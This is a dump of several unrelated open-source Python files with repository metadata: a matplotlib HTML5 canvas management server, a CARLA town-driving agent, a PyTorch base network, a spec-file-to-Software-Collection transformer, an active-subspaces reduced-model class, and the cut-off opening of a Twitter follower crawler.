t = self.thumb_inner.replace("<id>",str(figure_count))
t = t.replace("<!--thumbnail_port-->",str(port))
t = t.replace("<!--width-->",str(canvas._width)).replace("<!--height-->",str(canvas._height))
frame = str(canvas._frame).replace("\n","").replace(";c.",";c_t_" + str(figure_count) + ".").replace("{ c", "{ c_t_" + str(figure_count))
header = str(canvas._header).replace("\n","")
if frame.startswith("c."): frame = "c_t_" + str(figure_count) + frame[1:]
thumbs += t.replace('<!--thumbnail_content-->',header + frame) + "\n"
figure_count += 1
# insert thumbnail code into base page
self.wfile.write(self.thumb_html.replace("<!--thumbnail_body-->",thumbs))
else:
self.wfile.write("Not found...")
class H5Manager(object):
"""An H5 Canvas Manager.
Parameters
----------
port : integer
The base port on which to serve the managers web interface
"""
def __init__(self, base_port, limit):
self.ip = self._external_ip()
# find the next available port in multiples of 100 from base port
self._figures = {}
for x in range(limit):
port_to_try = base_port + x*100
try:
self._server = BaseHTTPServer.HTTPServer(('', port_to_try), RequestHandler)
self._thread = thread.start_new_thread(self._server.serve_forever, ())
self._wsserver = simple_server.WebSocketServer(('', port_to_try+1), self.management_request, simple_server.WebSocketRequestHandler)
self._wsthread = thread.start_new_thread(self._wsserver.serve_forever, ())
break
except Exception, e:
if x == limit - 1:
logger.error("Tried to find an available port pair from %i to %i, but none seemed available. You can only spawn %i python mplh5 instances on this machine.\nThis limit can be changed in init.py." % (base_port, base_port + (x-1)*100, limit))
sys.exit(1)
else:
logger.error("Failed to start management servers on ports (%i, %i). Trying another pair..." % (port_to_try, port_to_try+1))
logger.error(e)
time.sleep(0.05)
# we have a port :)
self.port = port_to_try
RequestHandler.h5m = self
RequestHandler.server_port = str(self.port)
self.url = "http://%s:%i" % (self.ip, self.port)
self._request_handlers = {}
print "============================================================================================"
print "Management interface active. Browse to %s to view all plots." % self.url
print "Alternatively, browse to %s/figure1 etc. to view individual figures." % self.url
print "============================================================================================"
sys.stdout.flush()
def _external_ip(self, preferred_prefixes=('eth', 'en')):
"""Return the external IPv4 address of this machine.
Attempts to use netifaces module if available, otherwise
falls back to socket.
Parameters
----------
preferred_prefixes : tuple
A tuple of string prefixes for network interfaces to match. e.g. ('eth','en') matches ethX and enX
with a preference for lowest number first (eth0 over eth3).
Returns
-------
ip : str or None
IPv4 address string (dotted quad). Returns None if
ip address cannot be guessed.
"""
if netifaces is None:
ips = [socket.gethostbyname(socket.gethostname())]
else:
preferred_ips = []
other_ips = []
for iface in netifaces.interfaces():
for addr in netifaces.ifaddresses(iface).get(netifaces.AF_INET, []):
if 'addr' in addr:
for prefix in preferred_prefixes:
if iface.startswith(prefix): preferred_ips.append(addr['addr'])
other_ips.append(addr['addr'])
# will duplicate those in preferred_ips but this doesn't matter as we only
# use other_ips if preferred is empty.
ips = preferred_ips + other_ips
if ips:
return ips[0]
else:
return "127.0.0.1"
def management_request(self, request):
self._request_handlers[request] = request.connection.remote_addr[0]
while True:
try:
line = request.ws_stream.receive_message()
request.ws_stream.send_message("update_thumbnails();".decode('utf-8'))
except Exception, e:
logger.debug("Removing registered management handler (%s)" % e)
if self._request_handlers.has_key(request): del self._request_handlers[request]
return
def tell(self):
recipients = ""
for r in self._request_handlers.keys():
try:
recipients += str(r.connection.remote_addr[0]) + " "
r.ws_stream.send_message("update_thumbnails();".decode('utf-8'))
except AttributeError:
logger.debug("Connection %s has gone. Closing..." % r.connection.remote_addr[0])
del self._request_handlers[request]
def add_figure(self, port, canvas):
"""Add a figure to the manager"""
self._figures[port] = canvas
self.tell()
def remove_figure(self, port):
"""Remove a figure from the manager"""
self._figures.pop(port)
self.tell()
def handle_base(self):
pass
def parse_web_cmd(self, s):
action = s[1:s.find(" ")]
args = s[s.find("args='")+6:-2].split(",")
method = getattr(self, "handle_%s" % action)
if method:
method(*args)
else:
self.handle_base()
| {
"repo_name": "Hojalab/mplh5canvas",
"path": "mplh5canvas/management_server.py",
"copies": "3",
"size": "10812",
"license": "bsd-3-clause",
"hash": -6913254020046609000,
"line_mean": 47.7027027027,
"line_max": 755,
"alpha_frac": 0.589345172,
"autogenerated": false,
"ratio": 4.169687620516776,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00555287105609114,
"num_lines": 222
} |
# A baseline town agent.
from agents.navigation.agent import Agent, AgentState
import numpy as np
from agents.navigation.local_planner import LocalPlanner
class RoamingAgent(Agent):
"""
RoamingAgent implements a basic agent that navigates scenes making random
choices when facing an intersection.
This agent respects traffic lights and other vehicles.
NOTE: need to re-create after each env reset
"""
def __init__(self, env):
"""
:param vehicle: actor to apply to local planner logic onto
"""
vehicle = env.vehicle
follow_traffic_lights = env.follow_traffic_lights
super(RoamingAgent, self).__init__(vehicle)
self._proximity_threshold = 10.0 # meters
self._state = AgentState.NAVIGATING
self._local_planner = LocalPlannerModified(self._vehicle)
self._follow_traffic_lights = follow_traffic_lights
def compute_action(self):
action, traffic_light = self.run_step()
throttle = action.throttle
brake = action.brake
steer = action.steer
#print('tbsl:', throttle, brake, steer, traffic_light)
if brake == 0.0:
return np.array([throttle, steer])
else:
return np.array([-brake, steer])
def run_step(self):
"""
Execute one step of navigation.
:return: carla.VehicleControl
"""
# is there an obstacle in front of us?
hazard_detected = False
# retrieve relevant elements for safe navigation, i.e.: traffic lights and other vehicles
actor_list = self._world.get_actors()
vehicle_list = actor_list.filter("*vehicle*")
lights_list = actor_list.filter("*traffic_light*")
# check possible obstacles
vehicle_state, vehicle = self._is_vehicle_hazard(vehicle_list)
if vehicle_state:
self._state = AgentState.BLOCKED_BY_VEHICLE
hazard_detected = True
# check for the state of the traffic lights
if hazard_detected:
control = self.emergency_stop()
else:
self._state = AgentState.NAVIGATING
# standard local planner behavior
control = self._local_planner.run_step()
throttle = control.throttle
brake = control.brake
steer = control.steer
#print('tbsl:', throttle, brake, steer, traffic_light)
if brake == 0.0:
return np.array([throttle, steer])
else:
return np.array([-brake, steer])
class LocalPlannerModified(LocalPlanner):
def __del__(self):
pass # otherwise it deletes our vehicle object
def run_step(self):
return super().run_step(debug=False) # otherwise by default shows waypoints, that interfere with our camera
class DummyTownAgent(Agent):
"""
A simple agent for the town driving task.
If the car is currently facing on a path towards the goal, drive forward.
If the car would start drivign away, apply maximum brakes.
"""
def __init__(self, env):
"""
:param vehicle: actor to apply to local planner logic onto
"""
self.env = env
super(DummyTownAgent, self).__init__(self.env.vehicle)
self._proximity_threshold = 10.0 # meters
self._state = AgentState.NAVIGATING
self._local_planner = LocalPlannerModified(self._vehicle)
def compute_action(self):
hazard_detected = False
# retrieve relevant elements for safe navigation, i.e.: traffic lights and other vehicles
actor_list = self._world.get_actors()
vehicle_list = actor_list.filter("*vehicle*")
lights_list = actor_list.filter("*traffic_light*")
# check possible obstacles
vehicle_state, vehicle = self._is_vehicle_hazard(vehicle_list)
if vehicle_state:
self._state = AgentState.BLOCKED_BY_VEHICLE
hazard_detected = True
rotation = self.env.vehicle.get_transform().rotation
forward_vector = rotation.get_forward_vector()
origin = self.env.vehicle.get_location()
destination = self.env.target_location
node_list = self.env.route_planner._path_search(origin=origin, destination=destination)
origin_xy = np.array([origin.x, origin.y])
forward_xy = np.array([forward_vector.x, forward_vector.y])
first_node_xy = self.env.route_planner._graph.nodes[node_list[0]]['vertex']
first_node_xy = np.array([first_node_xy[0], first_node_xy[1]])
target_direction_vector = first_node_xy - origin_xy
target_unit_vector = np.array(target_direction_vector) / np.linalg.norm(target_direction_vector)
vel_s = np.dot(forward_xy, target_unit_vector)
if vel_s < 0:
hazard_detected = True
if hazard_detected:
control = self.emergency_stop()
else:
self._state = AgentState.NAVIGATING
# standard local planner behavior
control = self._local_planner.run_step()
throttle = control.throttle
brake = control.brake
steer = control.steer
#print('tbsl:', throttle, brake, steer, traffic_light)
if brake == 0.0:
return np.array([throttle, steer])
else:
return np.array([-brake, steer])
| {
"repo_name": "rail-berkeley/d4rl",
"path": "d4rl/carla/town_agent.py",
"copies": "1",
"size": "5344",
"license": "apache-2.0",
"hash": 6374876813106817000,
"line_mean": 34.6266666667,
"line_max": 116,
"alpha_frac": 0.6236901198,
"autogenerated": false,
"ratio": 3.8893740902474527,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0013170948193391597,
"num_lines": 150
} |
'''A base network for handling common arguments in cortex models.
This is not necessary to use cortex: these are just convenience networks.
'''
import torch.nn as nn
import torch
from .utils import apply_nonlinearity, get_nonlinearity, finish_layer_1d
class BaseNet(nn.Module):
'''Basic convenience network for cortex.
Attributes:
models: A sequence of
'''
def __init__(self, nonlinearity='ReLU', output_nonlinearity=None):
super(BaseNet, self).__init__()
self.models = nn.Sequential()
self.output_nonlinearity = output_nonlinearity
self.layer_nonlinearity = get_nonlinearity(nonlinearity)
def forward(self,
x: torch.Tensor,
nonlinearity: str = None,
**nonlinearity_args: dict) -> torch.Tensor:
self.states = []
if nonlinearity is None:
nonlinearity = self.output_nonlinearity
elif not nonlinearity:
nonlinearity = None
for model in self.models:
x = model(x)
self.states.append(x)
x = apply_nonlinearity(x, nonlinearity, **nonlinearity_args)
return x
def get_h(self, dim_h, n_levels=None):
if isinstance(dim_h, (list, tuple)):
pass
elif n_levels:
dim_h = [dim_h for _ in range(n_levels)]
else:
dim_h = [dim_h]
return dim_h
def add_linear_layers(self,
dim_in,
dim_h,
dim_ex=None,
Linear=None,
**layer_args):
Linear = Linear or nn.Linear
if dim_h is None or len(dim_h) == 0:
return dim_in
for dim_out in dim_h:
name = 'linear_({}/{})'.format(dim_in, dim_out)
self.models.add_module(name, Linear(dim_in, dim_out))
finish_layer_1d(
self.models,
name,
dim_out,
nonlinearity=self.layer_nonlinearity,
**layer_args)
dim_in = dim_out
if dim_ex is not None:
dim_in += dim_ex
return dim_out
def add_output_layer(self, dim_in, dim_out, Linear=None):
Linear = Linear or nn.Linear
if dim_out is not None:
name = 'linear_({}/{})_{}'.format(dim_in, dim_out, 'out')
self.models.add_module(name, Linear(dim_in, dim_out))
def make_subnet(from_network, n_layers):
'''Makes a subnet out of another net.
Shares parameters with original network.
Args:
from_network: Network to derive subnet from.
n_layers: Number of layers from network to use.
Returns:
A Subnet for the original network.
'''
to_network = BaseNet()
to_network.models = from_network.models[:n_layers]
return to_network
| {
"repo_name": "rdevon/cortex",
"path": "cortex/built_ins/networks/base_network.py",
"copies": "1",
"size": "2899",
"license": "bsd-3-clause",
"hash": 8793533040607533000,
"line_mean": 26.875,
"line_max": 73,
"alpha_frac": 0.5484649879,
"autogenerated": false,
"ratio": 3.9766803840877913,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 104
} |
"""A base Transformer.
Used by Convertor to perform actual transformation of a specfile.
Operates with transformer plugins defined in `transformers` package.
"""
import re
from spec2scl import specfile
class Transformer(object):
"""A base Transformer class.
Converts tags and macro definitions in a conventional
spec file into a Software Collection spec file.
"""
subtransformers = []
def __init__(self, options={}):
self.options = options
self.options.setdefault('skip_functions', [])
self.options.setdefault('no_meta_runtime_dep', False)
self.options.setdefault('no_meta_buildtime_dep', False)
self.options.setdefault('scl_deps', True)
self.transformer_methods = self.collect_transformer_methods()
@classmethod
def register_transformer(cls, t):
"""Add a transformer to subtransformers list.
Used as a class decorator for transformer plugins.
"""
cls.subtransformers.append(t)
return t
def collect_transformer_methods(self):
"""Return a list of subtransformer methods decorated with matches.
Returns:
list of (<method>, <pattern>, <one line>, <sections>)
"""
transformers = []
for method in vars(type(self)).values():
if hasattr(method, 'matches') and method.__name__ not in self.options['skip_functions']:
for method_number in range(len(method.matches)):
transformers.append(
(getattr(self, method.__name__), method.matches[method_number],
method.one_line[method_number], method.sections[method_number]))
return transformers
def transform_one_liners(self, original_spec, section_name, section_text):
"""Apply transformation function to each line in the spec section."""
one_liners = list(filter(lambda x: x[2], self.transformer_methods))
split_section = section_text.splitlines()
for index, line in enumerate(split_section):
for func, pattern, _, sections in one_liners:
if section_name in sections and pattern.search(line):
# let all the patterns modify the line
line = func(original_spec, pattern, line)
split_section[index] = line
return '\n'.join(split_section)
def transform_more_liners(self, original_spec, section_name, section_text):
"""Apply transformation function to whole spec section."""
more_liners = filter(lambda x: not x[2], self.transformer_methods)
for func, pattern, _, sections in more_liners:
if section_name in sections and pattern.search(section_text):
section_text = func(original_spec, pattern, section_text)
return section_text
def transform(self, original_spec, transformers=[]):
"""Initialize subtransformer plugins and perform
conversion by each of them.
Returns:
converted spec file as a Specfile object
"""
spec = specfile.Specfile(original_spec)
import spec2scl.transformers # noqa
self.subtransformers = transformers or map(
lambda c: c(options=self.options), type(self).subtransformers)
for subtrans in self.subtransformers:
spec = subtrans._transform(original_spec, spec)
return spec
def _transform(self, original_spec, spec):
for i, section in enumerate(spec.sections):
spec.sections[i] = (
section[0], self._transform_section(original_spec, section[0], section[1]))
return spec
def _transform_section(self, original_spec, section_name, section_text):
"""Transform one section of a specfile.
Apply transformation methods applicable to the whole
section and each of it's lines.
"""
section_text = self.transform_one_liners(
original_spec, section_name, section_text)
section_text = self.transform_more_liners(
original_spec, section_name, section_text)
return section_text
# these methods are helpers for the actual transformations
def get_original_name(self, original_spec):
"""Return the name of the package as defined in the specfile."""
name_match = re.compile(r'Name:\s*([^\s]+)').search(original_spec)
if name_match:
return name_match.group(1)
else:
return 'TODO'
| {
"repo_name": "sclorg/spec2scl",
"path": "spec2scl/transformer.py",
"copies": "2",
"size": "4517",
"license": "mit",
"hash": 4662356550640623000,
"line_mean": 36.6416666667,
"line_max": 100,
"alpha_frac": 0.6309497454,
"autogenerated": false,
"ratio": 4.41544477028348,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.604639451568348,
"avg_score": null,
"num_lines": null
} |
""" A basic class for approximation, integration, and optimization with
active subspaces."""
import numpy as np
from utils.misc import process_inputs_outputs, process_inputs
from utils.simrunners import SimulationRunner, SimulationGradientRunner
from utils.plotters import eigenvalues, subspace_errors, eigenvectors, sufficient_summary
from response_surfaces import ActiveSubspaceResponseSurface
from integrals import integrate, av_integrate
from optimizers import minimize
from subspaces import Subspaces
from gradients import local_linear_gradients, finite_difference_gradients
from domains import UnboundedActiveVariableDomain, BoundedActiveVariableDomain, \
UnboundedActiveVariableMap, BoundedActiveVariableMap
import time
class ActiveSubspaceReducedModel():
"""
A class for approximation, optimization, and integration with active
subspaces.
:cvar bool bounded_inputs: flag that tells if the simulation's inputs
are bounded by an m-dimensional hypercube and equipped with a
uniform probability density function (True) or if they are unbounded
and equipped with a standard Gaussian density function (False).
:cvar ndarray X: M-by-m matrix that contains a set of simulation inputs.
Each row of `X` is a point in the simulations m-dimensional parameter
space. These points are used to train response surfaces. They are also
used in plots when analyzing the simulation.
:cvar ndarray f: M-by-1 matrix that contains the simulation outputs that
correspond to the rows of `X`. `f` is used as training data for
response surfaces.
:cvar int m: The dimension of the simulation inputs.
:cvar int n: The dimension of the active subspace. Typically `n` is less
than `m`---often much less.
:cvar function fun: A function that interfaces with the simulation. It
should take an ndarray of shape 1-by-m (e.g., a row of `X`), and it
should return a scalar. That scalar is the quantity of interest from
the simulation.
:cvar function dfun: A function that interfaces with the simulation. It
should take an ndarray of shape 1-by-m (e.g., a row of `X`), and it
should return the gradient of the quantity of interest as an ndarray of
shape 1-by-m.
:cvar active-subspaces.response_surfaces.ActiveSubspaceResponseSurface as_respsurf:
A response surface initialized and trained while building the model.
Once trained, it can be used as a cheap surrogate for the simulation
code.
:cvar float Rsqr: The R-squared coefficient for the response surface.
**Notes**
This class contains several convenient methods for working with active
subspaces. These methods are mostly wrappers to other parts of the library.
The methods are structured to be used with relatively little knowledge of
how active subspaces work. At best, this class provides a useful surrogate
for an expensive simulation with many input parameters.
There are two ways to build the model: one that uses given data (see the
method `build_from_data`) and the other that uses given interfaces to the
simulation (see the method `build_from_interface`). With a simulation
interface, the code is able to build response surfaces on its own design
sets, i.e., its own choice of points. Also, the choices for building
response surfaces are better with a given interface. However, one can still
learn a great deal about the simulation from a set of input/output pairs.
Once the model is built and the response surface is trained, one can use
the methods to estimate the average, probabilities, and the minimum of the
simulation quantity of interest as a function of the simulation inputs.
If the model is built from given input/output pairs, then `Rsqr` is the
R-squared coefficient from the response surface on the active variables. If
the model is built from a given interface, the R-squared coefficient is
computed from the output samples computed along with the gradients while
estimating the active subspace. This is a big advantage of building the
response surface with an interface.
"""
bounded_inputs = None
X, f = None, None
m, n = None, None
fun, dfun = None, None
as_respsurf = None
Rsqr = None
def __init__(self, m, bounded_inputs):
"""
Initialize the ActiveSubspaceReducedModel.
:param bool bounded_inputs: A flag that tells if the simulation's
inputs are bounded by an m-dimensional hypercube and equipped
with a uniform probability density function (True) or if they
are unbounded and equipped with a standard Gaussian density
function (False).
:param int m: The number of the simulation inputs, i.e., the dimension
of the space of simulation inputs.
**Notes**
An ActiveSubspaceReducedModel cannot exist without knowing some
information about the inputs to the simulation that the model is meant
to represent. `m` tells the model how many inputs the simulation takes.
There are two cases the code is set to handle respresented by the
boolean variable `bounded_inputs`. If `bounded_inputs` is True, then the
model assumes that the simulation inputs each take values in the
interval [-1,1]. This implies that the domain of the simulation quantity
of interest is the m-dimensional hypercube centered at the origin. In
reality, the simulation inputs may take values in some other shifted
and scaled hyperrectangle. We assume there is an implied shifting and
scaling from the simulation's natural inputs to the hypercube. We
assume that the hypercube is equipped with a uniform probability
density function that is 2^(-m) on the hypercube and zero outside it.
(We could talk for hours about whether or not this means that the
simulation inputs are "random." But let's avoid that discussion for
now.)
The second case is when `bounded_inputs` is False. In this case, the
simulation inputs are assumed unbounded. The simulation input space
is equipped with a standard Gaussian density function. Again, this
lets us compute integrals. The simulation's true inputs may be
unbounded with some correlation. In this case, we assume that the
inputs have been properly transformed to a standard Gaussian.
"""
if not isinstance(m, int):
raise TypeError('m must be an integer.')
else:
self.m = m
if not isinstance(bounded_inputs, bool):
raise TypeError('bounded_inputs must be a boolean.')
else:
self.bounded_inputs = bounded_inputs
def build_from_data(self, X, f, df=None, avdim=None):
"""
Build the active subspace-enabled model with input/output pairs.
:param ndarray X: M-by-m matrix with evaluations of the m-dimensional
simulation inputs.
:param ndarray f: M-by-1 matrix with corresponding simulation quantities
of interest.
:param ndarray df: M-by-m matrix that contains the gradients of the
simulation quantity of interest, oriented row-wise, that correspond
to the rows of `X`. If `df` is not present, then it is estimated
with crude local linear models using the pairs `X` and `f`.
:param int avdim: The dimension of the active subspace. If `avdim`
is not present, a crude heuristic is used to choose an active
subspace dimension based on the given data `X` and
`f`---and possible `df`.
**Notes**
This method follows these steps:
#. If `df` is None, estimate it with local linear models using the \
input/output pairs `X` and `f`.
#. Compute the active and inactive subspaces using `df`.
#. Train a response surface using `X` and `f` that exploits the active \
subspace.
"""
X, f, M, m = process_inputs_outputs(X, f)
# check if the given inputs satisfy the assumptions
if self.bounded_inputs:
if np.any(X) > 1.0 or np.any(X) < -1.0:
raise Exception('The supposedly bounded inputs exceed the \
bounds [-1,1].')
else:
if np.any(X) > 10.0 or np.any(X) < -10.0:
raise Exception('There is a very good chance that your \
unbounded inputs are not properly scaled.')
self.X, self.f, self.m = X, f, m
if df is not None:
df, M_df, m_df = process_inputs(df)
if m_df != m:
raise ValueError('The dimension of the gradients should be \
the same as the dimension of the inputs.')
else:
# if gradients aren't available, estimate them from data
df = local_linear_gradients(X, f)
# compute the active subspace
ss = Subspaces()
ss.compute(df)
if avdim is not None:
if not isinstance(avdim, int):
raise TypeError('avdim should be an integer.')
else:
ss.partition(avdim)
self.n = ss.W1.shape[1]
print 'The dimension of the active subspace is {:d}.'.format(self.n)
# set up the active variable domain and map
if self.bounded_inputs:
avdom = BoundedActiveVariableDomain(ss)
avmap = BoundedActiveVariableMap(avdom)
else:
avdom = UnboundedActiveVariableDomain(ss)
avmap = UnboundedActiveVariableMap(avdom)
# build the response surface
asrs = ActiveSubspaceResponseSurface(avmap)
asrs.train_with_data(X, f)
# set the R-squared coefficient
self.Rsqr = asrs.respsurf.Rsqr
self.as_respsurf = asrs
def build_from_interface(self, fun, dfun=None, avdim=None):
"""
Build the active subspace-enabled model with interfaces to the
simulation.
:param function fun: A function that interfaces with the simulation.
It should take an ndarray of shape 1-by-m (e.g., a row of `X`), and
it should return a scalar. That scalar is the quantity of interest from the simulation.
:param function dfun: A function that interfaces with the simulation.
It should take an ndarray of shape 1-by-m (e.g., a row of `X`), and it
should return the gradient of the quantity of interest as an ndarray of shape 1-by-m.
:param int avdim: The dimension of the active subspace. If `avdim` is not
present, it is chosen after computing the active subspaces using
the given interfaces.
**Notes**
This method follows these steps:
#. Draw random points according to the weight function on the space\
of simulation inputs.
#. Compute the quantity of interest and its gradient at the sampled\
inputs. If `dfun` is None, use finite differences.
#. Use the collection of gradients to estimate the eigenvectors and\
eigenvalues that determine and define the active subspace.
#. Train a response surface using the interface, which uses a careful\
design of experiments on the space of active variables. This design\
uses about 5 points per dimension of the active subspace.
"""
if not hasattr(fun, '__call__'):
raise TypeError('fun should be a callable function.')
if dfun is not None:
if not hasattr(dfun, '__call__'):
raise TypeError('dfun should be a callable function.')
if avdim is not None:
if not isinstance(avdim, int):
raise TypeError('avdim should be an integer')
m = self.m
# number of gradient samples
M = int(np.floor(6*(m+1)*np.log(m)))
# sample points for gradients
if self.bounded_inputs:
X = np.random.uniform(-1.0, 1.0, size=(M, m))
else:
X = np.random.normal(size=(M, m))
fun = SimulationRunner(fun)
f = fun.run(X)
self.X, self.f, self.fun = X, f, fun
# sample the simulation's gradients
if dfun == None:
df = finite_difference_gradients(X, fun)
else:
dfun = SimulationGradientRunner(dfun)
df = dfun.run(X)
self.dfun = dfun
# compute the active subspace
ss = Subspaces()
ss.compute(df)
if avdim is not None:
ss.partition(avdim)
self.n = ss.W1.shape[1]
print 'The dimension of the active subspace is {:d}.'.format(self.n)
# set up the active variable domain and map
if self.bounded_inputs:
avdom = BoundedActiveVariableDomain(ss)
avmap = BoundedActiveVariableMap(avdom)
else:
avdom = UnboundedActiveVariableDomain(ss)
avmap = UnboundedActiveVariableMap(avdom)
# build the response surface
asrs = ActiveSubspaceResponseSurface(avmap)
asrs.train_with_interface(fun, int(np.power(5,self.n)))
# compute testing error as an R-squared
self.Rsqr = 1.0 - ( np.linalg.norm(asrs.predict(X)[0] - f)**2 \
/ np.var(f) )
self.as_respsurf = asrs
def diagnostics(self):
"""
Make plots that help determine the quality of the active subspace-
enabled response surface and approximation.
**Notes**
This method produces four useful plots for verifying the quality of the
active subspace-enable approximation.
#. A semilog plot of the first 10 eigenvalues with their bootstrap ranges. \
One is typically looking for large gaps between the\
eigenvalues in the log space.
#. A semilog plot of the estimated errors in the estimated active\
subspace. This plot uses a bootstrap to estimate the errors.
#. A plot of the components of the first four eigenvectors. These\
components often reveal insights into the simulation's important\
parameters.
#. A 1d and a 2d summary plot of the computed quantity of interest at\
different values of the first and second active variables. These plots\
can be very useful in revealing the structure in the quantity of\
interest as a function of the inputs.
"""
ss = self.as_respsurf.avmap.domain.subspaces
eigenvalues(ss.eigenvalues[:10,0], e_br=ss.e_br[:10,:])
subspace_errors(ss.sub_br[:10,:])
eigenvectors(ss.eigenvectors[:,:4])
Y = np.dot(self.X, ss.eigenvectors[:,:2])
sufficient_summary(Y, self.f)
def predict(self, X, compgrad=False):
"""
Compute the value of the response surface at given values of the
simulation inputs.
:param ndarray X: M-by-m matrix containing points in simulation's
input space.
:param bool compgrad: Determines if the gradient of the response surface is
computed and returned. (Default is False)
:return: response surface values at the given `X`.
:return: df : estimated gradient at the given `X`. If `compgrad` is False, then `df` is
None.
:rtype: response_surface
:rtype: ndarray (M-by-m)
**See Also**
response_surfaces.ActiveSubspaceResponseSurface
**Notes**
The default response surface is a radial basis function approximation
using an exponential-squared (i.e., Gaussian) radial basis. The
eigenvalues from the active subspace analysis are used to determine the
characteristic length scales for each of the active variables. In other
words the radial basis is anisotropic, and the anisotropy is determined
by the eigenvalues.
The response surface also has a quadratic monomial basis. The
coefficients of the monomial basis are fit with weighted least-squares.
In practice, this is equivalent to a kriging or Gaussian process
approximation. However, such approximations bring several assumptions
about noisy data that are difficult, if not impossible, to verify in
computer simulations. I chose to avoid the difficulties that come with
such methods. That means there is no so-called prediction variance
associated with the response surface prediction. Personally, I think
this is better. The prediction variance has no connection to the
approximation error, except in very special cases. I prefer not to
confuse the user with things that look and smell like error bars but
aren't actually error bars.
"""
if not isinstance(compgrad, bool):
raise TypeError('compgrad should be a boolean')
X, M, m = process_inputs(X)
if m != self.m:
raise Exception('The dimension of the points is {:d} but should \
be {:d}.'.format(m, self.m))
f, df = self.as_respsurf.predict(X, compgrad=compgrad)
return f, df
def average(self, N):
"""
Estimate the average of the simulation over the input space.
**Parameters**
:param int N: The number of function calls to use when estimating the
average.
:return: mu, estimated average of the quantity of interest as a
function of the simulation inputs.
:return: lb, estimated lower bound on `mu`. It comes from the
variance of the Monte Carlo estimates when the model is built
with a simulation interface. When no simulation interface is
present, `lb` is None.
:return: ub, estimated upper bound on `mu`. It comes from the
variance of the Monte Carlo estimates when the model is built
with a simulation interface. When no simulation interface is
present, `ub` is None.
:rtype: float
:rtype: float
:rtype: float
**See Also**
integrals.integrate
**Notes**
When the model is built with a given simulation interface, the
quadrature rule for estimating the average includes simple Monte Carlo
integration over the inactive variables. These bounds do not include
errors from the quadrature rules on the active variables---only the
variance due to random sampling in Monte Carlo over the inactive
variables. Therefore, they should not be treated as precise bounds.
When the model is built from data, `mu` is the average of the
response surface. It's probably better to compute the average of the
training data directly.
"""
if not isinstance(N, int):
raise TypeError('N should be an integer.')
if N < 1:
raise ValueError('N should positive')
if self.fun is not None:
mu, lb, ub = integrate(self.fun, self.as_respsurf.avmap, N)
else:
mu = av_integrate(self.as_respsurf, self.as_respsurf.avmap, N)
lb, ub = None, None
return mu, lb, ub
def probability(self, lb, ub, M=10000):
"""
Estimate the probably that the quantity of interest is within a given
range.
:param float lb: The lower bound on the interval.
:param float ub: The upper bound on the interval.
:param int M: The number of samples of the response surface.
:return: p, The estimated probability that the quantity of interest
falls in the given interval.
:return: plb, A central limit theorem-based estimate of the lower 99%
confidence bound on `p`. Note that this lower bound is only from
the Monte Carlo used to estimate `p`. It does not include errors
in the response surface.
:return: pub, A central limit theorem-based estimate of the upper 99%
confidence bound on `p`. Note that this lower bound is only from
the Monte Carlo used to estimate `p`. It does not include errors
in the response surface.
:rtype: float
:rtype: float
:rtype: float
**Notes**
This method estimates the probability
P[lb <= f <= ub],
where f is the response surface approximation to the simulation
quantity of interest. It uses simple Monte Carlo to estimate this
probabiliy, and it includes central limit theorem-based 99% confidence
bounds.
"""
if not isinstance(lb, float):
if isinstance(lb, int):
lb = float(lb)
else:
raise TypeError('lb should be a float')
if not isinstance(ub, float):
if isinstance(ub, int):
ub = float(ub)
else:
raise TypeError('ub should be a float')
if self.bounded_inputs:
X = np.random.uniform(-1.0,1.0,size=(M,self.m))
else:
X = np.random.normal(size=(M,self.m))
f = self.as_respsurf(X)
c = np.all(np.hstack(( f>lb, f<ub )), axis=1)
p = np.sum(c) / float(M)
plb, pub = p+2.58*np.sqrt(p*(1-p)/M), p-2.58*np.sqrt(p*(1-p)/M)
return p, plb, pub
def minimum(self):
"""
Estimate the minimum of the quantity of interest.
:return: fstar, The estimated minimum of the quantity of interest over
the simulation input space.
:return: xstar, An ndarray of shape 1-by-m that is the approximate
minimizer of the simulation quantity of interest.
:rtype: float
:rtype: ndarray
**See Also**
optimizers.minimize
**Notes**
This method uses the active subspace-enabled response surface to search
for a minimizer in the simulation input space. It is only a heuristic.
There is not guarantee that this method finds the true global
minimum.
"""
xstar, fstar = minimize(self.as_respsurf, self.X, self.f)
return fstar, xstar
| {
"repo_name": "meyersw3476/active_subspaces",
"path": "active_subspaces/base.py",
"copies": "1",
"size": "22339",
"license": "mit",
"hash": -2519192052800470500,
"line_mean": 41.9596153846,
"line_max": 99,
"alpha_frac": 0.6447468553,
"autogenerated": false,
"ratio": 4.4244404832640125,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.003010856668110714,
"num_lines": 520
} |
# A Basic Crawler that retrieves all followers of a user and sends the data to the Service Layer
#
# 12-Aug-2013 12:33 AM ATC Developed using Python 2.7
# ATC = Ali Taylan Cemgil,
# Department of Computer Engineering, Bogazici University
# e-mail : taylan.cemgil@boun.edu.tr
import argparse
from twython import Twython, TwythonError
import requests
from tornado.escape import json_encode
# local
from drenaj.client.config.config import *
from drenaj.utils.drnj_time import *
environment = DRENAJ_APP_ENVIRONMENT
app_root_url = 'http://' + DRENAJ_APP_HOST + ':' + str(DRENAJ_APP_PORT[environment])
# TODO: Direnaj Login
# Create DirenjUser and Password the first time
# These mongodb indices must be defined
# > db.queue.ensureIndex({id: 1}, {unique: true})
# > db.graph.ensureIndex({id: 1})
# THESE TWO collections no more exist. -onurgu
# > db.profiles.ensureIndex({id: 1}, {unique: true})
# > db.users.ensureIndex({id: 1})
# also possible but not needed:
# > db.queue.ensureIndex({id_str: 1}, {unique: true})
#> db.graph.group({key : {id: 1}, cond: {id : {$gt: 221455715}}, reduce: function(curr, result) {result.total += 1}, initial: {total:0}}
# For some reason, the following cannot be obtained from config.py
auth_user_id = 'drenaj'
auth_password = 'tamtam'
key_store = KeyStore()
consumer_key = key_store.app_consumer_key
consumer_secret = key_store.app_consumer_secret
def drnj_graph_crawler(fof, root):
access_tokens = key_store.acquire_access_tokens()
access_token_key = access_tokens[0][0]
access_token_secret = access_tokens[0][1]
twitter = Twython(consumer_key, consumer_secret, access_token_key, access_token_secret)
cur = -1L
# The friends/followers IDS to be retrieved will be stored here
IDS = list()
#SS = list()
# Number of calls to the twitter API
remain = 0
# True if data is fetched correctly
success = True
# Seconds to wait before trying again twitter limit
